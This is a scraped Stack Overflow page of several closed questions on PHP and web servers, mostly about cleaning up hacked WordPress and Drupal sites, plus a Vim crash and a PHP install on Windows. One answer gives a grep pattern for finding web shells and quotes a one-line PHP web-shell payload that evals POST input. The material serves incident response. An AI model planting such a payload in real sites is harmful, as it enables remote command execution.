Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 6 years ago.
Improve this question
Is there a known way to hide PHP code within a file?
I got an error message referencing a malware variable in a php file on a wordpress website.
When I grep for the variable it shows me the malware in the file
When I open the file in nano it doesn't show
When I download via sftp the malware doesn't show in notepad++
I'm wondering if:
grep could somehow be seeing 'cached files'?
is there is a way to hide php code?
has anyone using php or wordpress ever seen something like this?
I did everything to double check, yes these are the same files and all the other tips that were pointed out. opcache is off. I have no idea.
Removing face palming situations from the equation (e.g. downloading the wrong file, downloading from the different server - which have happened to me before ;)), maybe you could try to use
grep -n [variable name]
to figure out the line (-n) where the variable is in the file. That might help you.
Another suggestion is downloading the file and using diff tools against a known good version of the infected file.
Related
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 6 years ago.
Improve this question
I have PHP file on my virtual Linux CentOS machine and intermittently when I open it I am getting right away
Vim: Caught deadly signal SEGV
Vim: Finished. Segmentation fault.
I tested that file many times there are no any kind of hidden special characters. More over if I open another PHP file or for that matter any file and open my troubled file from it (:e file_name) I can view it, edit and save without any problems.
Any suggestions what is wrong with that file and how to fix it?
Try following command:
vim -u NONE <your_file>
it will launch vim without processing /etc/vimrc and ~/.vimrc
If you'll be able to edit your file then it means that the problem is one of your vim plugins. Try disabling them one by one and see what happens.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 7 years ago.
Improve this question
I got trouble with some hackers, they hacked into our website, so I cloned our server to a new one, and then reset the github on that server.
I heard about rsync can find out what is different about 2 servers. Is it possible for rsync ? Can I export that list of files to a text file?
Thanks your help, got hacked by use old version of wordpress >_< I was crazy with this from last couple days.
The comment by Marty is good - the rsync command as written will do a dry-run (-n) to show you what files were added/deleted/changed between the $TARGET and $SOURCE locations so you can then inspect or diff them to see if there is any malicious code.
Additionally, in the past when I've dealt with hacked WordPress installs, it is important to find the exploitation vector. Often times PHP shells get uploaded via some insecure script or plugin which gives the attacker a command based web shell to view files and run commands etc.
To find these files, the following command is helpful:
grep -E '(?:(shell_)?exec|system|eval)' /path/to/wordpress/* -R
This might yield something like:
wpte.php: eval($_POST['p1']);
Which in this case, wpte.php was a malicious PHP shell script that got uploaded to one of my client's servers that someone then used to run commands and upload more files. These scripts usually use one or more functions like eval or shell_exec to run commands input from the web shell.
Going from there, you can check the server access logs for hits to the malicious script and then further search the logs for the IP address(es) that accessed that script to potentially find how the uploaded the script or other hits resources they accessed.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 7 years ago.
Improve this question
I got mail from Google Webmaster tools that strange URLs where indexed. URLs like mywebsite.com/cheap-medicine/, etc.
I have a Drupal website and I can see those URLs are indexed. And using proxy I can see the page myself. However, I cannot find the source.
I have looked into a bunch of files but they are unchanged.
Also I searched my entire database and of course looked into Drupal backend for strange content.
I even searched my entire server using Linux grep, also no result for words on the page. The database URL / routing tables also show no strange URLs.
I did of course also check .htaccess files
How are these URLs accessible if I cannot find them anywhere?
Look into your .htaccess file, it contains a lot of power. It can make these strange URIs mask themselves. Try to check the validity of that file. This might be where this is coming from.
If your .htaccess file, or any .htaccess file inside any subdirectory of the site weren't hacked on then you probably want to reinstall the Drupal core. If you followed proper development practice by never editing third party core files, then you will not lose any work or time, because it will be a fresh default copy of what you installed the first time.
After this, make sure core runs correctly in a default state, and that the problem is gone. Then you can copy back in your source files to your Drupal framework and reconfigure and resume.
If the problem comes back after you put your source files back, then the problem is in your sources.
You can also try grepping for the terms individually i.e. grep -rin "medicine" ./* on a GNU/Linux box to see if these terms show up.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 8 years ago.
Improve this question
I have LAMP installed in my server and I use virtualhosts to map domains to subdirectories. I need to allow my customers to upload files (including php) to their server using FTP.
The problem is that a customer using a domain xxx.com.br uploaded a file test.php and executed it like:
xxx.com.br/test.php
The content of test.php if file_put_contents("../../xxx.txt","teste") and it worked! The file xxx.txt was created 2 levels above his domain folder! How do I prevent this from happening?
Don't give the PHP process access to directories it isn't meant to reach.
That's kind of the point of the whole permission system.
In Linux, PHP will generally run as its own user, just make sure that user doesn't have read or write permission to any files you don't want exposed.
For this purpose exists open_basedir configuration directive. More information about it for example here.
Moreover it is good to use FastCGI which allows each script to be run under its owner. More information about it for example here.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 9 years ago.
Improve this question
I've been using PHP-5.4.3 for about a month now, and today, I decided to make a switch to PHP-5.5.5, I downloaded the source code, and placed it in C:/php (also renaming the folder php-5.5.5 to php) and I added server variables, as usual C:/php/ <-- but here I got stuck. Because, usually I appended the php.exe at the end, which was found inside the PHP folder so, I could be able to access PHP from the command line, or start the built-in server, but now,I can't find this file, and I can't find a way to start the server from the command line either.
You can compile php yourself. It's simply 2-4 commands and its also explained. I can run configure then make install. You can run configure --help to see all the options. It can be useful if you compile for fast-cgi or need more space or a faster php.
The source code you downloaded needs to be built...
You can download a binary version from here (assuming you're using Windows, of course).
Or read this if you want to build it yourself. There are many other tutorials online.